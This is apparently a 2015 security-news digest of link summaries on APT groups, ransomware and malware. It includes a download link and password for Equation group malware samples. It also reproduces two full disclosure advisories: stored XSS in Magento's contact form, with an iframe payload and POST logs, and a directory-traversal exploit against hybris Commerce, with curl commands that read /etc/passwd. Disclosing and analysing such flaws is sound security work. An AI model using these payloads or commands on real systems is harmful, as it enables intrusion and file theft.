Channel: BOT24

The research: Mobile Internet traffic hijacking via GTP and GRX

Most users assume that mobile network access is much safer because a big mobile-telecoms provider will protect subscribers. Unfortunately, as practice shows, mobile Internet is a great opportunity for the attacker.

more here.........http://blog.ptsecurity.com/2015/02/the-research-mobile-internet-traffic.html

EXRS- Exercises for learning Reverse Engineering and Exploitation.

All the sploit exercises are designed to be solvable with NX+ASLR without being dependent on which libc is used. The idea is you should only interact with stdin / stdout as if it was a remote service, argv & env is not needed for exploitation.

Of course you can still do whatever you like, have fun!

more here.......https://github.com/wapiflapi/exrs

More on The Great Bank Robbery: the Carbanak APT From Kaspersky

The story of Carbanak began when a bank from Ukraine asked us to help with a forensic investigation. Money was being mysteriously stolen from ATMs. Our initial thoughts tended towards the Tyupkin malware. However, upon investigating the hard disk of the ATM system we couldn't find anything except a rather odd VPN configuration (the netmask was set to 172.0.0.0).

more here.......http://securelist.com/blog/research/68732/the-great-bank-robbery-the-carbanak-apt/

(Sample Files Added & Password) The Equation Cyber Attack Group: The Death Star of Malware Galaxy & Arstechnica Story "How “omnipotent” hackers tied to NSA hid for 14 years—and were found at last"

It is not known when the Equation group began their ascent. Some of the earliest malware samples we have seen were compiled in 2002; however, their C&C was registered in August 2001. Other C&Cs used by the Equation group appear to have been registered as early as 1996, which could indicate this group has been active for almost two decades. For many years they have interacted with other powerful groups, such as the Stuxnet and Flame groups; always from a position of superiority, as they had access to exploits earlier than the others.

more here........https://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/

and here......http://arstechnica.com/security/2015/02/how-omnipotent-hackers-tied-to-the-nsa-hid-for-14-years-and-were-found-at-last/


and here are the files provided by R136a1
@MalwareChannel with ZIP Password: infected........https://www.dropbox.com/s/latggdox9s3xv4t/Equation_x86_x64.zip?dl=0

CTB-Locker encryption/decryption scheme in details

After my last post about CTB-Locker I received a lot of e-mails from people asking for a complete analysis of the malware. Most of them wanted to know if it’s possible to restore the compromised files without paying the ransom. The answer is simple: it’s impossible without knowing the Master key! That key resides on the malicious server and it’s the only way to restore every single compromised file.

There are some articles on the net about CTB-Locker’s modus operandi. Everyone knows that ZLib is used and AES is used, but only a few of them mention the use of SHA256+Curve. To explain everything in detail I’ll show you how encryption/decryption is done, step by step here..........https://zairon.wordpress.com/2015/02/17/ctb-locker-encryptiondecryption-scheme-in-details/

Walking Heap Using Pydbg

I'm a big fan of Pydbg. Although it has many awesome features, it also has a few limitations. One of them is the lack of control over the process heap. For a long time I've been thinking of writing something which makes heap manipulation / heap parsing / traversing using pydbg a little easier for reverse engineers. So finally last weekend I wrote a couple of small py scripts which can parse Windows 7 process heaps on the fly.

more here.........http://www.debasish.in/2015/02/walking-heap-using-pydbg.html


Banking Malware VAWTRAK Now Uses Malicious Macros, Abuses Windows PowerShell

Last year we saw how the Windows PowerShell® command shell was involved in spreading ROVNIX via malicious macro downloaders. Though the attack seen in November did not directly abuse the PowerShell feature, we’re now seeing the banking malware VAWTRAK abuse this Windows feature, while also employing malicious macros in Microsoft Word.

The banking malware VAWTRAK is involved with stealing online banking information. Some of the targeted banks include Bank of America, Barclays, Citibank, HSBC, Lloyd’s Bank, and J.P. Morgan. Other variants seen in the past targeted German, British, Swiss, and Japanese banks.

more here.......http://blog.trendmicro.com/trendlabs-security-intelligence/banking-malware-vawtrak-now-uses-malicious-macros-abuses-windows-powershell/

Automating Removal of Java Obfuscation

In this post we detail a method to improve analysis of Java code for a particular obfuscator; we document the process that was followed and demonstrate the results of automating our method. Obscurity will not stop an attacker, and once the method is known, a methodology can be developed to automate the process.

more here.........http://www.contextis.com/resources/blog/automating-removal-java-obfuscation/

APT is a Who not a What... And Why it doesn't Matter

A small number of topics get intelligence driven incident responders incredibly frustrated:

Using intelligence to mean smart (I’ll share more about that later this week)
Bad attribution based on incomplete information and bad assumptions
Misuse of the term APT (in most cases by marketing departments)
Advanced Persistent Threat remains the buzzword of choice for vendors, but it's used incorrectly, and lots of people know that and don’t say anything. As a result I want to go on the record and correct a couple of key misnomers.


more here.......http://sroberts.github.io/2015/02/16/apt-is-a-who-not-a-what/

DbgKit

DbgKit is the first GUI extension for Debugging Tools for Windows. It will show you a hierarchical view of processes and detailed information about each process including its full image path, command line, start time, memory statistics, VADs, handles, threads, security attributes, modules, environment variables and more.

more here............http://www.andreybazhan.com/dbgkit/

A Fanny Equation: "I am your father, Stuxnet"

At the Virus Bulletin conference in 2010, researchers from Kaspersky Lab partnered with Microsoft to present findings related to Stuxnet. The joint presentation included slides dealing with various parts of Stuxnet, such as the zero-days used in the attack.

Perhaps the most interesting zero-day exploit from Stuxnet was the LNK exploit (CVE-2010-2568). This allowed Stuxnet to propagate through USB drives and infect even machines that had Autorun disabled.

It was discovered during the 2010 research into Stuxnet that the LNK exploit had earlier been used in another malware, supposedly a Zlob PE, that pointed to "fanny.bmp".

more here.........http://securelist.com/blog/research/68787/a-fanny-equation-i-am-your-father-stuxnet/

Ebay Inc Magento Bug Bounty #5 - Persistent Validation & Mail Encoding Web Vulnerability

Document Title:
===============
Ebay Inc Magento Bug Bounty #5 - Persistent Validation & Mail Encoding Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1226

eBay Inc. Bug Bounty Program ID: EIBBP-27288

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/02/14/ebay-inc-magento-2015q1-official-bug-bounty-program-rewards-security-researcher


Release Date:
=============
2015-02-14


Vulnerability Laboratory ID (VL-ID):
====================================
1226


Common Vulnerability Scoring System:
====================================
3.8


Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed
by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned
solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model
to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What's equally important to protecting
this data? Our security researchers and user community. If you find a site that isn't following our policies, or a vulnerability
inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://magento.com/security  &  http://magento.com/security )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation and mail encoding web vulnerability in the official eBay Magento and Magento info web-application.


Vulnerability Disclosure Timeline:
==================================
2014-03-14: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2014-03-15: Vendor Notification (eBay Inc Security Team - Bug Bounty Program)
2014-03-10: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program)
2015-02-12: Vendor Fix/Patch (Magento Developer Team)
2015-02-13: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program)
2015-02-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ebay Inc.
Product: Magento - Web Application Service 2014 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side mail encoding web vulnerability has been discovered in the official eBay Magento & Info Web-Application.
The vulnerability allows remote attackers to bypass the outgoing mail filter validation of the magento web-server & web-application.

The vulnerability is located in the first- and lastname values of the `Talk to a Specialist` module. Remote attackers without a privileged application
user account are able to inject persistent malicious script code. The script code execution occurs in the notification mail to the specialist but
also in the active user's copy mail. The persistently injected script code executes in the header section where the database context of the first- and
lastname is displayed. The sender interacts automatically by usage of the magento.com & info.magento.com service. The validation of the db
stored outgoing values is wrongly encoded and allows persistent injection of malicious script code via POST method. The attack vector is persistent
and the injection request method is POST.

The security risk of the mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8.
Exploitation of the web vulnerability requires no privileged web-application user account and low or medium user interaction because of the
persistent attack vector. Successful exploitation of the encoding vulnerability results in session hijacking, persistent phishing, persistent
external redirects and persistent manipulation of web header or mail body context.

Vulnerable Domain(s):
                                [+] magento.com & info.magento.com

Vulnerable Module(s):
                                [+] Talk to a Specialist

Vulnerable Parameter(s):
                                [+] firstname
                                [+] lastname
                                [+] companyname

Affected Sender(s):
                                [+]  info@magento.com

Affected Receiver(s):
                                [+] bkm@evolution-sec.com


Affected Context Module(s):
                                [+] Section 1  > mktEditable


Proof of Concept (PoC):
=======================
The application-side input validation web vulnerability can be exploited by remote attackers without privileged user account and with low or medium user interaction.
For security demonstration or to reproduce the mail encoding web vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. You do not need to register an account ;)
2. Open up the main website and switch to the magento.com contacts site
3. At the bottom you need to click the `talk to specialist` button
4. You get redirected to a regular valid form with a mod specialist notification
5. Inject your script code payloads as first-, last- and companyname values
6. Click the send request button ...
Note: Now, you will be redirected by the service after choosing a specialist ... we used `E.C. Kraus` (#sry ;)
7. Send the same request from the input below to the specialist with a non-malicious test payload
8. The persistent code execution occurs in the mail to the manager aka specialist but also to the sender of the notification itself (without user auth!)
9. Successful reproduction of the persistent script code injection web vulnerability via POST method request


PoC: Your E.C. Kraus Magento Enterprise Case Study Download

<html><head>
<title>Your E.C. Kraus Magento Enterprise Case Study Download</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td><b>Betreff: </b>Your E.C. Kraus Magento Enterprise Case Study Download</td></tr><tr><td>
<b>Von: </b>Magento <info@magento.com></td></tr><tr><td><b>Datum: </b>15.03.2014 20:27</td></tr></tbody></table>
<table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; ">
<title></title>
<div id="Section 1" class="mktEditable"><p>Dear a "><[PERSISTENT INJECTED SCRIPT CODE 1!]">%20<[PERSISTENT INJECTED SCRIPT CODE 2!]>,</p>
<p>Thank you for requesting the Magento Enterprise Case Study on E.C. Kraus.  You can download the Case Study here:</p>
<p><a href=
"http://email.magento.com/397EXO8770000EP01aGC801"
>Download</a></p>
<p>Check out our complete list of <a href=
"http://email.magento.com/397EXO8770000EQ01aGC801"
>Magento Case Studies</a></p>
<p>To learn more about Magento Enterprise or to reqeust a personalized quote, please <a href=
"http://email.magento.com/397EXO8770000ER01aGC801"
>contact out Magento Enterprise team</a>.</p>
<p>Thank you,</p>
<p>The Magento Team</p></div>
<IMG SRC="http://email.magento.com/trk?t=1&mid=Mzk3LUVYTy04Nzc6MDozMzkyOjExMzI1OjA6MzMxNzo3OjE3MzIzNDI4LTE6bnVsbA%3D%3D" WIDTH="1" HEIGHT="1" BORDER="0" ALT="" />
</body>
</html>
</body>
</html>
</iframe></p></div></body></html>


--- PoC Session Logs [POST] ---
21:15:18.356[654ms][total 2913ms]
Status: 200[OK]
GET http://magento.com/explore/contact-sales
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[magento.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://magento.com/customers/customer-showcase]
      Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; has_js=1; ClrSSID=1394911380598-4406; ClrOSSID=1394911380598-4406; ClrSCD=1394911380598; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fcustomers%2Fcustomer-showcase; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentomagento%2Cmagentoglobal%3D%2526pid%253D%25252Fcustomers%25252Fcustomer-showcase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmagento.com%25252Fexplore%25252Fcontact-sales_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=-%2C84%2C84%2C2200; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com]
      Connection[keep-alive]
      If-None-Match["1394841413-1"]
   Response Header:
      Server[maged]
      Date[Sat, 15 Mar 2014 20:15:18 GMT]
      Content-Type[text/html; charset=utf-8]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Drupal-Cache[HIT]
      Etag["1394841413-1"]
      x-content-type-options[nosniff]
      X-Frame-Options[SameOrigin]
      Content-Language[en]
      Link[<http://magento.com/explore/contact-sales>; rel="canonical",<http://magento.com/node/22>; rel="shortlink"]
      Cache-Control[public, max-age=86400]
      Last-Modified[Fri, 14 Mar 2014 23:56:53 +0000]
      Expires[Sun, 19 Nov 1978 05:00:00 GMT]
      Vary[Cookie, Accept-Encoding]
      Content-Encoding[gzip]
      X-Server[web04]
-
21:15:34.123[335ms][total 335ms]
Status: 302[Found]
POST https://info.magento.com/index.php/leadCapture/save
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[135] Mime Type[text/html]
   Request Header:
      Host[info.magento.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://info.magento.com/EC-Kraus.html]
      Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; BIGipServerabjweb-ssl2_http=3892838666.20480.0000; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fec-kraus.html; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentoinfo%2Cmagentoglobal%3D%2526pid%253D%25252Fec-kraus.html%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BformSubmit%252528document.getElementById%252528%252522mktForm_1129%252522%252529%252529%25253Breturnfalse%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT; s_ppv=-%2C100%2C100%2C832; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; BIGipServerabjweb-ssl2_https=3909615882.47873.0000; ClrSSID=1394911532386-9188; ClrOSSID=1394911532386-9188; ClrSCD=1394911532386; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com; optimizelyPendingLogEvents=%5B%5D; ClrCSTO=T]
      Connection[keep-alive]
   POST-Daten:
      FirstName[%3Ciframe+src%3Da%3E]
      LastName[%3Ciframe+src%3Da%3E]
      Email[bkm%40evolution-sec.com]
      _marketo_comments[]
      lpId[2314]
      subId[36]
      munchkinId[397-EXO-877]
      kw[not+found]
      cr[not+found]
      searchstr[not+found]
      lpurl[https%3A%2F%2Finfo.magento.com%2FEC-Kraus.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D]
      formid[1129]
      returnURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html]
      retURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html]
      returnLPId[2301]
      _mkt_disp[return]
      _mkt_trk[id%3A397-EXO-877%26token%3A_mch-magento.com-1394911532816-55587]
      _comments_marketo[]
      _mkto_version[2.4.7]
   Response Header:
      Date[Sat, 15 Mar 2014 20:15:34 GMT]
      Server[Apache]
      Location[https://info.magento.com/EC-Kraus-confirm.html?aliId=67114725]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Content-Length[135]
      Connection[close]
      Content-Type[text/html]


Reference(s):
http://magento.com/customers/customer-showcase
http://magento.com/explore/contact-sales
https://info.magento.com/EC-Kraus-confirm.html?aliId=67114607
https://info.magento.com/EC-Kraus.html
https://info.magento.com/index.php/leadCapture/save


Resource(s):
                                ../Contact Sales _ Magento-inputstep1.htm
                                ../Contact Sales _ Magento-inputstep2.htm
                                ../EC-Kraus-confirm.html
                                ../EC-Kraus-poc2.html
                                ../Your E.C. Kraus Magento Enterprise Case Study Download.html
                                ../Your E.C. Kraus Magento Enterprise Case Study Download.eml
                                ../poc-session-logs.txt
                                ../poc-url-references.txt


Picture(s): (view magazine article)
                                ../1.png
                                ../2.png
                                ../3.png
                                ../4.png
                                ../5.png
                                ../6.png
                                ../7.png


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing or encoding the `talk to a specialist` input context.
Also encode and parse the outgoing user values of the talk to a specialist form to prevent persistent injections via POST into outgoing eBay Magento service mails.
Restrict the input and disallow the usage of special chars.
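The fix section above asks for two things: encode the stored name values at the point where they are placed into the outgoing HTML mail, and restrict the characters accepted on input. The Python below is an added example, not code from the advisory, from Magento or from the Marketo lead-capture service: it shows the raw-interpolation defect beside the entity-encoded version, an input policy of the kind the advisory recommends, and a screen over a lead-capture POST body that flags name fields carrying markup. The greeting template mimics the `mktEditable` section of the PoC mail, the field names follow the session log (FirstName, LastName), and the Company field, the character policy and all function names are assumptions.

```python
import html
import re
from string import Template

# Fragment modelled on the "Section 1 / mktEditable" greeting in the PoC mail;
# the template text is constructed for this example, not Magento's own.
GREETING_TEMPLATE = Template(
    '<div id="Section 1" class="mktEditable"><p>Dear $first $last,</p>'
    '<p>Thank you for requesting the case study.</p></div>'
)

# Characters that never belong in a person or company name (assumed policy;
# the advisory only says "disallow the usage of special chars").
FORBIDDEN_NAME_CHARS = frozenset('<>"\'`\\{}')
MAX_NAME_LEN = 80

# Markers that indicate markup or script in a name field; used for flagging only.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z]|javascript:|on[a-z]+\s*=", re.IGNORECASE)


def render_greeting_unsafe(first: str, last: str) -> str:
    """The defect: stored values dropped into the HTML body without encoding."""
    return GREETING_TEMPLATE.substitute(first=first, last=last)


def render_greeting_safe(first: str, last: str) -> str:
    """Hardened form: HTML-entity-encode every user-controlled value at output time."""
    return GREETING_TEMPLATE.substitute(
        first=html.escape(first, quote=True),
        last=html.escape(last, quote=True),
    )


def validate_name(value: str, max_len: int = MAX_NAME_LEN) -> str:
    """Input-side restriction: reject control characters and markup-significant characters."""
    value = value.strip()
    if not value or len(value) > max_len:
        raise ValueError(f"name must be 1..{max_len} characters")
    if any(ch in FORBIDDEN_NAME_CHARS or ord(ch) < 0x20 for ch in value):
        raise ValueError("name contains forbidden characters")
    return value


def name_is_acceptable(value: str) -> bool:
    """Boolean wrapper around validate_name for callers that only need a decision."""
    try:
        validate_name(value)
        return True
    except ValueError:
        return False


def flag_submission(form: dict[str, str]) -> list[str]:
    """Return the name fields of a lead-capture POST body that carry markup.

    FirstName and LastName follow the session log; Company is an assumed field
    name for the third affected parameter.
    """
    return [field for field in ("FirstName", "LastName", "Company")
            if field in form and MARKUP_RE.search(form[field])]


# Constructed POST body reusing the advisory's URL-decoded payload "<iframe src=a>".
SAMPLE_POST = {
    "FirstName": "<iframe src=a>",
    "LastName": "<iframe src=a>",
    "Email": "bkm@evolution-sec.com",
    "formid": "1129",
}

if __name__ == "__main__":
    first, last = SAMPLE_POST["FirstName"], SAMPLE_POST["LastName"]
    print("unsafe:", render_greeting_unsafe(first, last))
    print("safe:  ", render_greeting_safe(first, last))
    print("flagged fields:", flag_submission(SAMPLE_POST))
```

Output encoding is the fix that actually closes the hole: the input policy reduces what gets stored, but a second entry point (an API, an import, a later form) can bypass it, while `render_greeting_safe` stays correct regardless of how the value arrived.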


Security Risk:
==============
The security risk of the persistent input validation and mail encoding web vulnerability is estimated as medium. (CVSS 3.8)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Detecting and exploiting path-relative stylesheet import (PRSSI) vulnerabilities

Early last year Gareth Heyes unveiled a fascinating new technique for attacking web applications by exploiting path-relative stylesheet imports, and dubbed it ‘Relative Path Overwrite’. This attack tricks browsers into importing HTML pages as stylesheets by abusing the path handling features of many common web languages and frameworks. Thanks to extremely tolerant stylesheet parsing, this can frequently be used to inject malicious CSS and hijack user accounts.

This technique is currently quite esoteric, so it’s often effective against sites that have already been subjected to professional or crowdsourced audits. However, successfully exploiting it in a real world environment involves navigating an array of arcane browser internals that often aren't otherwise highly relevant to pentesters. This post aims to help out by walking through the process of identifying and exploiting this issue, using a real vulnerability in the popular bulletin board software phpBB3 as a worked example.

more here...........http://blog.portswigger.net/2015/02/prssi.html

Detect Equation Group Malware with THOR

THOR in version 7.20.1 is able to detect the Equation Group malware mentioned in the recently released reports by Kaspersky Labs.

more here.........https://www.bsk-consulting.de/2015/02/17/detect-equation-group-malware-with-thor/

Celebrity chef Jamie Oliver’s website hacked, redirects to exploit kit

While routinely checking the latest exploits and sites hacked, we came across a strange infection pattern that seemed to start from popular website jamieoliver[dot]com (ranked #536 in the UK and bringing in an average of 10 million visits per month), the official site of British chef Jamie Oliver.

Contrary to most web-borne exploits we see lately, this one was not the result of a malicious ad (malvertising) but rather a carefully and well hidden malicious injection in the site itself.

more here........https://blog.malwarebytes.org/exploits-2/2015/02/celebrity-chef-jamie-olivers-website-hacked-redirects-to-exploit-kit/

Paper: A Tour beyond BIOS Using Intel ® VT-d for DMA Protection in UEFI BIOS

This paper presents a design methodology for using Intel VT-d in a UEFI BIOS for
purposes of resisting DMA attacks against the host UEFI firmware from devices.


more here.........http://firmware.intel.com/sites/default/files/resources/A_Tour_Beyond_BIOS_Using_Intel_VT-d_for_DMA_Protection.pdf

Also included are the slides from the ShmooCon talk "Betting BIOS Bugs Won’t Bite Y’er Butt?" here.....http://www.legbacore.com/Research_files/2015_ShmooCon_BIOSBugs.pdf

FreeBSD RNG broken for last 4 months

If you are running a current kernel r273872 or later, please upgrade
your kernel to r278907 or later immediately and regenerate keys.

more here..........https://lists.freebsd.org/pipermail/freebsd-current/2015-February/054580.html

Duplicate SSH Keys Everywhere

Back in December when I revamped the SSH banner and started collecting the fingerprint I noticed an odd behavior. It turns out that a few SSH keys are used a lot more than once.

more here.........https://blog.shodan.io/duplicate-ssh-keys-everywhere/

[RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite

Advisory: Directory Traversal and Arbitrary File Disclosure in hybris
          Commerce Software Suite

During a penetration test, RedTeam Pentesting discovered a Directory
Traversal vulnerability in hybris Commerce software suite. This
vulnerability allows attackers to download arbitrary files of any size
from the affected system.


Details
=======

Product: hybris Commerce Software Suite
Affected Versions:
  Release 5.3:   <= 5.3.0.1
  Release 5.2:   <= 5.2.0.3
  Release 5.1.1: <= 5.1.1.2
  Release 5.1:   <= 5.1.0.1
  Release 5.0.4: <= 5.0.4.4
  Release 5.0.3: <= 5.0.3.3
  Release 5.0.0: <= 5.0.0.3
Fixed Versions:
  Release 5.3:      5.3.0.2
  Release 5.2:      5.2.0.4
  Release 5.1.1:    5.1.1.3
  Release 5.1:      5.1.0.2
  Release 5.0.4:    5.0.4.5
  Release 5.0.3:    5.0.3.4
  Release 5.0.0:    5.0.0.4
Vulnerability Type: Directory Traversal, Arbitrary File Disclosure
Security Risk: high
Vendor URL: http://www.hybris.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016
Advisory Status: published
CVE: CVE-2014-8871
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871


Introduction
============

"hybris delivers a commerce software suite that is best in class,
helping a company execute all its direct selling processes and present a
single view and a unified experience to all its customers."

(from the vendor's homepage)


More Details
============

Webshops based on hybris may use an image retrieval system where images
are identified by a URL parameter named "context" rather than a file
name. When this system is used, images can be referenced e.g. like the
following:

<img src="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBl
Z3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3
YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200" />

Changing the file name part of the URL from "image.jpg" to e.g.
"redteam.jpg" reveals that not the file name part of the URL, but the
value of the parameter "context" is used to select the desired file.

A closer look at the parameter shows that its value is encoded as
Base64. Decoding it reveals a pipe-separated data structure which
includes a file size (third value), a file name (fifth value) and a
SHA-256 hash (sixth value):

$ echo -n "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpw\
Z3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk\
1OTkxYjc4NTJiODU1" | base64 -d

master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c89
96fb92427ae41e4649b934ca495991b7852b855

During the penetration test many parameters were inspected and it turned
out that the SHA-256 hash is used to reference a particular version of
the file, and can be replaced by a dash ("-") character, which always
returns the latest version. The example request can be modified and
requested with curl as follows:

$ echo -n "master|root|12345|image/jpeg|7415687361172.jpg|-" | base64
bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt
$ curl -I http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\
8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt


It was verified that the file name (fifth) value is vulnerable to
directory traversal. This enables attackers to retrieve the contents of
other files from the server's filesystem by using sequences of "../".
The following HTTP request for example delivers the contents of the file
"/etc/passwd":

$ echo -n "master|root|12345|text/plain|../../../../../../etc/passwd|-"\
  | base64 -w0
bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz
c3dkfC0=

$ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\
IzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
